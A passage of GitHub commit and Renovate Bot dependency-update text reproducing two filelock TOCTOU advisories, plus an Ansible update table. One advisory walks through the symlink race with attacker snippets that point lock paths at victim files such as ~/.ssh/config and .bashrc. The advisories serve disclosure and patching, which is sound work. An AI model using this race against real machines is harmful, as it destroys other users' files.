- **Denial of Service** - attacker can prevent lock file creation by
maintaining symlink
- **Resource serialization failures** - multiple processes may acquire
"locks" simultaneously
- **Unintended file operations** - lock could operate on
attacker-controlled files

**CVSS v4.0 Score:** 5.6 (Medium)
**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

**Attack Requirements:**
- Local filesystem access to the directory containing lock files
- Permission to create symlinks (standard for regular unprivileged users
on Unix/Linux)
- Ability to time the symlink creation during the narrow race window

---

##### Patches

_Has the problem been patched? What versions should users upgrade to?_

Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag
to prevent symlink following during lock file creation.

**Patched Version:** Next release (commit:
255ed068bc85d1ef406e50a135e1459170dd1bf0)

**Mitigation Details:**
- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades
on platforms without support
- On platforms with `O_NOFOLLOW` support (most modern systems): symlink
attacks are completely prevented
- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window
remains but is documented

**Users should:**
- Upgrade to the patched version when available
- For critical deployments, consider using `UnixFileLock` or
`WindowsFileLock` instead of the fallback `SoftFileLock`

---

##### Workarounds

_Is there a way for users to fix or remediate the vulnerability without
upgrading?_

For users unable to update immediately:

1. **Avoid `SoftFileLock` in security-sensitive contexts** - use
`UnixFileLock` or `WindowsFileLock` when available (these were already
patched for CVE-2025-68146)

2. **Restrict filesystem permissions** - prevent untrusted users from
creating symlinks in lock file directories:
   ```bash
   chmod 700 /path/to/lock/directory
   ```

3. **Use process isolation** - isolate untrusted code from lock file
paths to prevent symlink creation

4. **Monitor lock operations** - implement application-level checks to
verify lock acquisitions are successful before proceeding with critical
operations

---

##### References

_Are there any links users can visit to find out more?_

- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in
UnixFileLock/WindowsFileLock)
- **CWE-362 (Concurrent Execution using Shared Resource):**
https://cwe.mitre.org/data/definitions/362.html
- **CWE-367 (Time-of-check Time-of-use Race Condition):**
https://cwe.mitre.org/data/definitions/367.html
- **CWE-59 (Improper Link Resolution Before File Access):**
https://cwe.mitre.org/data/definitions/59.html
- **O_NOFOLLOW documentation:**
https://man7.org/linux/man-pages/man2/open.2.html
- **GitHub Repository:** https://github.com/tox-dev/filelock

---

**Reported by:** George Tsigourakos (@&#8203;tsigouris007)

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H`

#### References
-
[https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701)
-
[https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0)
-
[https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5)
-
[https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)

This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

###
[`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

<!-- Release notes generated using configuration in .github/release.yaml
at 3.28.0 -->

#### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**:
<tox-dev/filelock@3.27.0...3.28.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Renovate
Bot](https://redirect.github.com/renovatebot/renovate).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My44My4yIiwidXBkYXRlZEluVmVyIjoiNDMuODMuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIiwiZmlsZWxvY2siLCJyZW5vdmF0ZSJdfQ==-->

Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
renovate-coop-norge Bot added a commit to coopnorge/engineering-docker-images that referenced this pull request Apr 15, 2026
@renovate-coop-norge
chore(deps): update dependency filelock to v3.28.0 [security] (#3881)
143411a 
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2`
→ `3.28.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/filelock/3.28.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/filelock/3.25.2/3.28.0?slim=true)
|

---

### filelock has a TOCTOU race condition which allows symlink attacks
during lock file creation
[CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) /
[GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f)

<details>
<summary>More information</summary>

#### Details
##### Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local
attackers to corrupt or truncate arbitrary user files through symlink
attacks. The vulnerability exists in both Unix and Windows lock file
creation where filelock checks if a file exists before opening it with
O_TRUNC. An attacker can create a symlink pointing to a victim file in
the time gap between the check and open, causing os.open() to follow the
symlink and truncate the target file.

**Who is impacted:**

All users of filelock on Unix, Linux, macOS, and Windows systems. The
vulnerability cascades to dependent libraries:

- **virtualenv users**: Configuration files can be overwritten with
virtualenv metadata, leaking sensitive paths
- **PyTorch users**: CPU ISA cache or model checkpoints can be
corrupted, causing crashes or ML pipeline failures
- **poetry/tox users**: through using virtualenv or filelock on their
own.

Attack requires local filesystem access and ability to create symlinks
(standard user permissions on Unix; Developer Mode on Windows 10+).
Exploitation succeeds within 1-3 attempts when lock file paths are
predictable.

##### Patches

Fixed in version **3.20.1**.

**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in
UnixFileLock.\_acquire() to prevent symlink following.

**Windows fix:** Added GetFileAttributesW API check to detect reparse
points (symlinks/junctions) before opening files in
WindowsFileLock.\_acquire().

**Users should upgrade to filelock 3.20.1 or later immediately.**

##### Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note:
different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod
0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running
trusted applications

**Warning:** These workarounds provide only partial mitigation. The race
condition remains exploitable. Upgrading to version 3.20.1 is strongly
recommended.

______________________________________________________________________

##### Technical Details: How the Exploit Works

##### The Vulnerable Code Pattern

**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):

```python
def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC  # (1) Prepare to truncate
    if not Path(self.lock_file).exists():  # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate
```

**Windows** (`src/filelock/_windows.py:19-28`):

```python
def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)  # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)  # (3) Open and truncate
```

##### The Race Window

The vulnerability exists in the gap between operations:

**Unix variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file exists? → False
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

**Windows variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file writable?
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink/junction
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

##### Step-by-Step Attack Flow

**1. Attacker Setup:**

```python

##### Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"  # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target
```

**2. Attacker Creates Race Condition:**

```python
import os
import threading

def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass

    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")

##### Launch attack
threading.Thread(target=attacker_thread).start()
```

**3. Victim Application Runs:**

```python
from filelock import UnixFileLock

##### Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE

##### At this point, /home/victim/.ssh/config is now 0 bytes!
```

**4. What Happens Inside os.open():**

On Unix systems, when `os.open()` is called:

```c
// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!

    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }

    return file_descriptor;
}
```

Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates
the target file.

##### Why the Attack Succeeds Reliably

**Timing Characteristics:**

- **Check operation** (Path.exists()): ~100-500 nanoseconds
- **Symlink creation** (os.symlink()): ~1-10 microseconds
- **Race window**: ~1-5 microseconds (very small but exploitable)
- **Thread scheduling quantum**: ~1-10 milliseconds

**Success factors:**

1. **Tight loop**: Running attack in a loop hits the race window within
1-3 attempts
2. **CPU scheduling**: Modern OS thread schedulers frequently
context-switch during I/O operations
3. **No synchronization**: No atomic file creation prevents the race
4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only
operation)

##### Real-World Attack Scenarios

**Scenario 1: virtualenv Exploitation**

```python

##### Victim runs: python -m venv /tmp/myenv
##### Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")

##### Result: /home/victim/.bashrc overwritten with:

##### home = /usr/bin/python3
##### include-system-site-packages = false

##### version = 3.11.2
##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker
```

**Scenario 2: PyTorch Cache Poisoning**

```python

##### Victim runs: import torch
##### PyTorch checks CPU capabilities, uses filelock on cache

##### Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock")

##### Result: Trained ML model checkpoint truncated to 0 bytes

##### Impact: Weeks of training lost, ML pipeline DoS
```

##### Why Standard Defenses Don't Help

**File permissions don't prevent this:**

- Attacker doesn't need write access to victim_file
- os.open() with O_TRUNC follows symlinks using the *victim's*
permissions
- The victim process truncates its own file

**Directory permissions help but aren't always feasible:**

- Lock files often created in shared /tmp directory (mode 1777)
- Applications may not control lock file location
- Many apps use predictable paths in user-writable directories

**File locking doesn't prevent this:**

- The truncation happens *during* the open() call, before any lock is
acquired
- fcntl.flock() only prevents concurrent lock acquisition, not symlink
attacks

##### Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

**Simple Direct Attack** (`filelock_simple_poc.py`):

- Success rate: 33% per attempt (1 in 3 tries)
- Average attempts to success: 2.1
- Target file reduced to 0 bytes in \<100ms

**virtualenv Attack** (`weaponized_virtualenv.py`):

- Success rate: ~90% on first attempt (deterministic timing)
- Information leaked: File paths, Python version, system configuration
- Data corruption: Complete loss of original file contents

**PyTorch Attack** (`weaponized_pytorch.py`):

- Success rate: 25-40% per attempt
- Impact: Application crashes, model loading failures
- Recovery: Requires cache rebuild or model retraining

**Discovered and reported by:** George Tsigourakos
(@&#8203;tsigouris007)

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H`

#### References
-
[https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f)
-
[https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e)
-
[https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)
-
[https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1)
-
[https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants)
-
[https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html)

This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in
SoftFileLock
[CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) /
[GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw)

<details>
<summary>More information</summary>

#### Details
##### Vulnerability Summary

**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in
SoftFileLock

**Affected Component:** `filelock` package - `SoftFileLock` class
**File:** `src/filelock/_soft.py` lines 17-27
**CWE:** CWE-362, CWE-367, CWE-59

---

##### Description

A TOCTOU race condition vulnerability exists in the `SoftFileLock`
implementation of the filelock package. An attacker with local
filesystem access and permission to create symlinks can exploit a race
condition between the permission validation and file creation to cause
lock operations to fail or behave unexpectedly.

The vulnerability occurs in the `_acquire()` method between
`raise_on_not_writable_file()` (permission check) and `os.open()` (file
creation). During this race window, an attacker can create a symlink at
the lock file path, potentially causing the lock to operate on an
unintended target file or leading to denial of service.

##### Attack Scenario

```
1. Lock attempts to acquire on /tmp/app.lock
2. Permission validation passes
3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock
4. os.open() tries to create lock file
5. Lock operates on attacker-controlled target file or fails
```

---

##### Impact

_What kind of vulnerability is it? Who is impacted?_

This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition
vulnerability** affecting any application using `SoftFileLock` for
inter-process synchronization.

**Affected Users:**
- Applications using `filelock.SoftFileLock` directly
- Applications using the fallback `FileLock` on systems without `fcntl`
support (e.g., GraalPy)

**Consequences:**
- **Silent lock acquisition failure** - applications may not detect that
exclusive resource access is not guaranteed
- **Denial of Service** - attacker can prevent lock file creation by
maintaining symlink
- **Resource serialization failures** - multiple processes may acquire
"locks" simultaneously
- **Unintended file operations** - lock could operate on
attacker-controlled files

**CVSS v4.0 Score:** 5.6 (Medium)
**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

**Attack Requirements:**
- Local filesystem access to the directory containing lock files
- Permission to create symlinks (standard for regular unprivileged users
on Unix/Linux)
- Ability to time the symlink creation during the narrow race window

---

##### Patches

_Has the problem been patched? What versions should users upgrade to?_

Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag
to prevent symlink following during lock file creation.

**Patched Version:** Next release (commit:
255ed068bc85d1ef406e50a135e1459170dd1bf0)

**Mitigation Details:**
- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades
on platforms without support
- On platforms with `O_NOFOLLOW` support (most modern systems): symlink
attacks are completely prevented
- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window
remains but is documented

**Users should:**
- Upgrade to the patched version when available
- For critical deployments, consider using `UnixFileLock` or
`WindowsFileLock` instead of the fallback `SoftFileLock`

---

##### Workarounds

_Is there a way for users to fix or remediate the vulnerability without
upgrading?_

For users unable to update immediately:

1. **Avoid `SoftFileLock` in security-sensitive contexts** - use
`UnixFileLock` or `WindowsFileLock` when available (these were already
patched for CVE-2025-68146)

2. **Restrict filesystem permissions** - prevent untrusted users from
creating symlinks in lock file directories:
   ```bash
   chmod 700 /path/to/lock/directory
   ```

3. **Use process isolation** - isolate untrusted code from lock file
paths to prevent symlink creation

4. **Monitor lock operations** - implement application-level checks to
verify lock acquisitions are successful before proceeding with critical
operations

---

##### References

_Are there any links users can visit to find out more?_

- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in
UnixFileLock/WindowsFileLock)
- **CWE-362 (Concurrent Execution using Shared Resource):**
https://cwe.mitre.org/data/definitions/362.html
- **CWE-367 (Time-of-check Time-of-use Race Condition):**
https://cwe.mitre.org/data/definitions/367.html
- **CWE-59 (Improper Link Resolution Before File Access):**
https://cwe.mitre.org/data/definitions/59.html
- **O_NOFOLLOW documentation:**
https://man7.org/linux/man-pages/man2/open.2.html
- **GitHub Repository:** https://github.com/tox-dev/filelock

---

**Reported by:** George Tsigourakos (@&#8203;tsigouris007)

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H`

#### References
-
[https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701)
-
[https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0)
-
[https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5)
-
[https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)

This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

###
[`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

<!-- Release notes generated using configuration in .github/release.yaml
at 3.28.0 -->

#### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**:
<tox-dev/filelock@3.27.0...3.28.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Renovate
Bot](https://redirect.github.com/renovatebot/renovate).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My44My4yIiwidXBkYXRlZEluVmVyIjoiNDMuODMuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIiwiZmlsZWxvY2siLCJyZW5vdmF0ZSJdfQ==-->

Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
rockygeekz added a commit to ansible/molecule that referenced this pull request May 6, 2026
@renovate @rockygeekz
chore(deps): update all dependencies (#4621)
8600b5f 
> ℹ️ **Note**
> 
> This PR body was truncated due to platform limits.

This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) | Type |
Update | Pending |
|---|---|---|---|---|---|---|
|
[ansible-navigator](https://redirect.github.com/ansible/ansible-navigator)
([changelog](https://redirect.github.com/ansible/ansible-navigator/releases))
| `26.1.3` → `26.4.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/ansible-navigator/26.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ansible-navigator/26.1.3/26.4.0?slim=true)
| dependency-groups | minor | |
| [ansible/actions](https://redirect.github.com/ansible/actions) |
`v0.5.1` → `v1.1.2` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/ansible%2factions/v1.1.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/ansible%2factions/v0.5.1/v1.1.2?slim=true)
| repository | major | |
|
[ansible/ansible-lint](https://redirect.github.com/ansible/ansible-lint)
| `v26.2.0` → `v26.4.0` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/ansible%2fansible-lint/v26.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/ansible%2fansible-lint/v26.2.0/v26.4.0?slim=true)
| repository | minor | |
|
[ansible/team-devtools](https://redirect.github.com/ansible/team-devtools)
| `v26.2.0` → `v26.4.0` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/ansible%2fteam-devtools/v26.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/ansible%2fteam-devtools/v26.2.0/v26.4.0?slim=true)
| repository | minor | |
|
[astral-sh/uv-pre-commit](https://redirect.github.com/astral-sh/uv-pre-commit)
| `0.10.7` → `0.11.8` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/astral-sh%2fuv-pre-commit/0.11.8?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/astral-sh%2fuv-pre-commit/0.10.7/0.11.8?slim=true)
| repository | minor | `0.11.10` (+1) |
| [biomejs/pre-commit](https://redirect.github.com/biomejs/pre-commit) |
`v2.4.4` → `v2.4.14` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/biomejs%2fpre-commit/v2.4.14?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/biomejs%2fpre-commit/v2.4.4/v2.4.14?slim=true)
| repository | patch | |
| [build](https://redirect.github.com/pypa/build)
([changelog](https://build.pypa.io/en/stable/changelog.html)) | `1.4.2`
→ `1.5.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/build/1.5.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/build/1.4.2/1.5.0?slim=true)
| dependency-groups | minor | |
| [click](https://redirect.github.com/pallets/click)
([changelog](https://click.palletsprojects.com/page/changes/)) | `8.3.2`
→ `8.3.3` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/click/8.3.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/click/8.3.2/8.3.3?slim=true)
| project.dependencies | patch | |
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2`
→ `3.29.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/filelock/3.29.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/filelock/3.25.2/3.29.0?slim=true)
| dependency-groups | minor | |
| [prek](https://prek.j178.dev/)
([source](https://redirect.github.com/j178/prek),
[changelog](https://redirect.github.com/j178/prek/blob/master/CHANGELOG.md))
| `0.3.8` → `0.3.11` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/prek/0.3.11?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/prek/0.3.8/0.3.11?slim=true)
| dependency-groups | patch | `0.3.13` (+1) |
| [rhysd/actionlint](https://redirect.github.com/rhysd/actionlint) |
`v1.7.11` → `v1.7.12` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/rhysd%2factionlint/v1.7.12?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/rhysd%2factionlint/v1.7.11/v1.7.12?slim=true)
| repository | patch | |
| [rich](https://redirect.github.com/Textualize/rich) | `14.3.3` →
`15.0.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/rich/15.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/rich/14.3.3/15.0.0?slim=true)
| project.dependencies | major | |
| [ruff](https://docs.astral.sh/ruff)
([source](https://redirect.github.com/astral-sh/ruff),
[changelog](https://redirect.github.com/astral-sh/ruff/blob/main/CHANGELOG.md))
| `0.15.9` → `0.15.12` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/ruff/0.15.12?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ruff/0.15.9/0.15.12?slim=true)
| dependency-groups | patch | |
| [tombi](https://redirect.github.com/tombi-toml/tombi) | `0.9.14` →
`0.10.2` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/tombi/0.10.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/tombi/0.9.14/0.10.2?slim=true)
| dependency-groups | minor | `0.10.5` (+2) |
| [tox](https://redirect.github.com/tox-dev/tox)
([changelog](https://tox.wiki/en/latest/changelog.html)) | `4.52.0` →
`4.53.1` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/tox/4.53.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/tox/4.52.0/4.53.1?slim=true)
| dependency-groups | minor | |
| [tox-uv](https://redirect.github.com/tox-dev/tox-uv#tox-uv)
([changelog](https://redirect.github.com/tox-dev/tox-uv/releases)) |
`1.34.0` → `1.35.1` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/tox-uv/1.35.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/tox-uv/1.34.0/1.35.1?slim=true)
| dependency-groups | minor | `1.35.2` |
| [types-jsonschema](https://redirect.github.com/python/typeshed)
([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/jsonschema.md))
| `4.26.0.20260402` → `4.26.0.20260408` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/types-jsonschema/4.26.0.20260408?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/types-jsonschema/4.26.0.20260402/4.26.0.20260408?slim=true)
| dependency-groups | patch | |
| [types-pexpect](https://redirect.github.com/python/typeshed)
([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/pexpect.md))
| `4.9.0.20260127` → `4.9.0.20260408` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/types-pexpect/4.9.0.20260408?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/types-pexpect/4.9.0.20260127/4.9.0.20260408?slim=true)
| dependency-groups | patch | |
| [types-pyyaml](https://redirect.github.com/python/typeshed)
([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/PyYAML.md))
| `6.0.12.20250915` → `6.0.12.20260408` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/types-pyyaml/6.0.12.20260408?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/types-pyyaml/6.0.12.20250915/6.0.12.20260408?slim=true)
| dependency-groups | patch | |

Note: The `pre-commit` manager in Renovate is not supported by the
`pre-commit` maintainers or community. Please do not report any problems
there, instead [create a Discussion in the Renovate
repository](https://redirect.github.com/renovatebot/renovate/discussions/new)
if you have any questions.

---

### Release Notes

<details>
<summary>ansible/ansible-navigator (ansible-navigator)</summary>

###
[`v26.4.0`](https://redirect.github.com/ansible/ansible-navigator/releases/tag/v26.4.0)

[Compare
Source](https://redirect.github.com/ansible/ansible-navigator/compare/v26.1.3...v26.4.0)

#### Maintenance

- chore(deps): update all dependencies
([#&#8203;2106](https://redirect.github.com/ansible/ansible-navigator/issues/2106))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;2100](https://redirect.github.com/ansible/ansible-navigator/issues/2100))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- ci: Fix CI, assisted by AI
([#&#8203;2104](https://redirect.github.com/ansible/ansible-navigator/issues/2104))
[@&#8203;Andersson007](https://redirect.github.com/Andersson007)

</details>

<details>
<summary>ansible/actions (ansible/actions)</summary>

###
[`v1.1.2`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.2)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.1.1...v1.1.2)

#### Fixes

- fix: make renovate and md hook use version from action
([#&#8203;112](https://redirect.github.com/ansible/actions/issues/112))
